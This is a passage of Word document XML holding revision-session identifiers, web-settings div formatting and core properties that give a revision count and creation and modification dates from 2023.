    <w:rsid w:val="008666AA"/>
    <w:rsid w:val="008862F8"/>
    <w:rsid w:val="00893E8D"/>
    <w:rsid w:val="008B60AF"/>
    <w:rsid w:val="008C0C10"/>
    <w:rsid w:val="008C2054"/>
    <w:rsid w:val="008D2466"/>
    <w:rsid w:val="008D3233"/>
    <w:rsid w:val="008E4165"/>
    <w:rsid w:val="008F18C8"/>
    <w:rsid w:val="008F2B4A"/>
    <w:rsid w:val="008F30FF"/>
    <w:rsid w:val="008F755A"/>
    <w:rsid w:val="008F76D3"/>
    <w:rsid w:val="00900668"/>
    <w:rsid w:val="00903595"/>
    <w:rsid w:val="00914F8A"/>
    <w:rsid w:val="00916E37"/>
    <w:rsid w:val="00917626"/>
    <w:rsid w:val="00921403"/>
    <w:rsid w:val="009303B4"/>
    <w:rsid w:val="00933DCA"/>
    <w:rsid w:val="0094184C"/>
    <w:rsid w:val="00950F42"/>
    <w:rsid w:val="00962C00"/>
    <w:rsid w:val="009662AA"/>
    <w:rsid w:val="00970BF8"/>
    <w:rsid w:val="009764B7"/>
    <w:rsid w:val="009A34DE"/>
    <w:rsid w:val="009F411A"/>
    <w:rsid w:val="00A01591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A446BA"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00AF10D6"/>
    <w:rsid w:val="00AF3753"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B156EB"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC1739"/>
    <w:rsid w:val="00BC3984"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C44177"/>
    <w:rsid w:val="00C44B26"/>
    <w:rsid w:val="00C4551B"/>
    <w:rsid w:val="00C46CCB"/>
    <w:rsid w:val="00C47C8F"/>
    <w:rsid w:val="00C61158"/>
    <w:rsid w:val="00C74415"/>
    <w:rsid w:val="00C84C96"/>
    <w:rsid w:val="00CB1CA7"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>
    <w:rsid w:val="00D043EB"/>
    <w:rsid w:val="00D46E1C"/>
    <w:rsid w:val="00D64007"/>
    <w:rsid w:val="00D70127"/>
    <w:rsid w:val="00D76CFA"/>
    <w:rsid w:val="00D82D12"/>
    <w:rsid w:val="00DA01A0"/>
    <w:rsid w:val="00DA1896"/>
    <w:rsid w:val="00DB3836"/>
    <w:rsid w:val="00DC6ED7"/>
    <w:rsid w:val="00DD59AE"/>
    <w:rsid w:val="00DF3E68"/>
    <w:rsid w:val="00E014E9"/>
    <w:rsid w:val="00E036C2"/>
    <w:rsid w:val="00E050CA"/>
    <w:rsid w:val="00E3082B"/>
    <w:rsid w:val="00E31496"/>
    <w:rsid w:val="00E35637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EC1C27"/>
    <w:rsid w:val="00EC37BE"/>
    <w:rsid w:val="00EF5628"/>
    <w:rsid w:val="00F24ADA"/>
    <w:rsid w:val="00F443AB"/>
    <w:rsid w:val="00F455FA"/>
    <w:rsid w:val="00F51D87"/>
    <w:rsid w:val="00F63D6F"/>
    <w:rsid w:val="00F748E3"/>
    <w:rsid w:val="00F9385F"/>
    <w:rsid w:val="00F950C9"/>
    <w:rsid w:val="00FB1ED0"/>
    <w:rsid w:val="00FB7477"/>
    <w:rsid w:val="00FB7C64"/>
    <w:rsid w:val="00FC69AB"/>
    <w:rsid w:val="00FD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7808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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 w:id="204270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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>